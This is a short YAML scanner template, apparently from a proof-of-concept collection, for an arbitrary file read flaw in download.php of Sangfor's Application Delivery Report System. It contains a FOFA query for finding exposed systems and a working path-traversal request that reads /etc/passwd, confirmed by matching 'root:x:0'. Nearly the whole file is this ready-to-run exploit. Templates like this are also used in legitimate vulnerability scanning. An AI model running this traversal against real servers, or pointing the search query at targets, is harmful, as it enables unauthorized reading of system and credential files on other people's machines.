product: 深信服应用交付报表系统
vName: 深信服应用交付报表系统 download.php任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 深信服 应用交付报表系统download.php文件存在任意文件读取漏洞，攻击者通过漏洞可以下载服务器任意文件
version: ''
note: ''
search:
  FOFA: app="SANGFOR-应用交付报表系统"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17666147.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /report/download.php?pdf=../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - 'root:x:0'
            logic: and